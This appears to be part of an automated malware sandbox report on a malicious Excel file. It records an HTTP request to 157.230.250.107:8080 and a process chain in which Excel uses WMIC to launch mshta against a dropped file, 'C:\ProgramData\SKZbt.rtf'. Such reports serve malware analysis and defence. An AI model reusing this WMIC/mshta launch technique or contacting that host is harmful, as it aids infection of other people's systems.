                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Language: en-US
                                                                                                                                              User-Agent: pissoff
                                                                                                                                              Host: 157.230.250.107:8080
                                                                                                                                              Dec 2, 2021 00:36:12.467221975 CET12241INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx/1.15.12
                                                                                                                                              Date: Wed, 01 Dec 2021 23:36:12 GMT
                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                              Content-Length: 9
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Data Raw: 68 69 20 69 64 69 6f 74 73
                                                                                                                                              Data Ascii: hi idiots


                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              Analysis Process: EXCEL.EXE PID: 5036 Parent PID: 792

                                                                                                                                              General

                                                                                                                                              Start time:00:34:35
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                              Imagebase:0x1390000
                                                                                                                                              File size:27110184 bytes
                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: WMIC.exe PID: 2176 Parent PID: 5036

                                                                                                                                              General

                                                                                                                                              Start time:00:36:07
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:wmic process call create "mshta C:\ProgramData\SKZbt.rtf"
                                                                                                                                              Imagebase:0x300000
                                                                                                                                              File size:391680 bytes
                                                                                                                                              MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: conhost.exe PID: 2596 Parent PID: 2176

                                                                                                                                              General

                                                                                                                                              Start time:00:36:07
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: WmiPrvSE.exe PID: 984 Parent PID: 792

                                                                                                                                              General

                                                                                                                                              Start time:00:36:08
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                              Imagebase:0x7ff7e33a0000
                                                                                                                                              File size:488448 bytes
                                                                                                                                              MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: mshta.exe PID: 6124 Parent PID: 984

                                                                                                                                              General

                                                                                                                                              Start time:00:36:09
                                                                                                                                              Start date:02/12/2021
                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:mshta C:\ProgramData\SKZbt.rtf
                                                                                                                                              Imagebase:0x7ff6fabf0000
                                                                                                                                              File size:14848 bytes
                                                                                                                                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Chronological Activities

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >